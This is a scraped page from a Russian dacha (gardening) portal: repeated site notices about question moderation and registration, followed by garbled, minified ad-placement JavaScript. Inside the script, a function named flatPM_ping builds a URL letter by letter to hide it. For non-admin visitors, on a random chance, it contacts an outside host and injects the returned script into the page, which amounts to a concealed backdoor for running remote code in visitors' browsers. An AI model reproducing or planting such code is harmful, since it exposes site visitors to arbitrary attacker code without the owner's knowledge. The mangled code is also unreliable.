Портал для тех, кто любит свою дачу

Ваш вопрос отправлен на модерацию.
Не переживайте, мы быстро проверяем вопросы и ответ на ваш вопрос будет оставлен в течение 1 дня.

Мы обратили внимание, что вы уже зарегистрированы на нашем сайте. Рекомендуем авторизоваться, чтобы просмотреть созданный вопрос. Если вы не помните пароль — можете восстановить его.

Вы не были зарегистрированы до сегодняшнего дня, поэтому мы зарегистрировали вас. Ваш пароль отправлен вам на указанный почтовый ящик.

Помогите нашему сайту развиваться!

Пожалуйста, прочитайте это обращение, оно не отнимет у вас много времени!

Нам так не хватает ваших комментариев и вопросов, чтобы понимать в каком направлении нам развиваться.

Не забудьте оставить комментарий, если вы нашли то что искали.
А если не нашли — задайте вопрос через форму «Спросить эксперта» в шапке сайта.
Мы ответим на этот вопрос, и другие посетители смогут найти ту информацию, которую не смогли найти вы.

С уважением,
команда портала Дача-Дача.ру

Ваш вопрос отправлен на модерацию.
Не переживайте, мы быстро проверяем вопросы и ответ на ваш вопрос будет оставлен в течение 1 дня.

Мы обратили внимание, что вы уже зарегистрированы на нашем сайте. Рекомендуем авторизоваться, чтобы просмотреть созданный вопрос. Если вы не помните пароль — можете восстановить его.

Вы не были зарегистрированы до сегодняшнего дня, поэтому мы зарегистрировали вас. Ваш пароль отправлен вам на указанный почтовый ящик.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};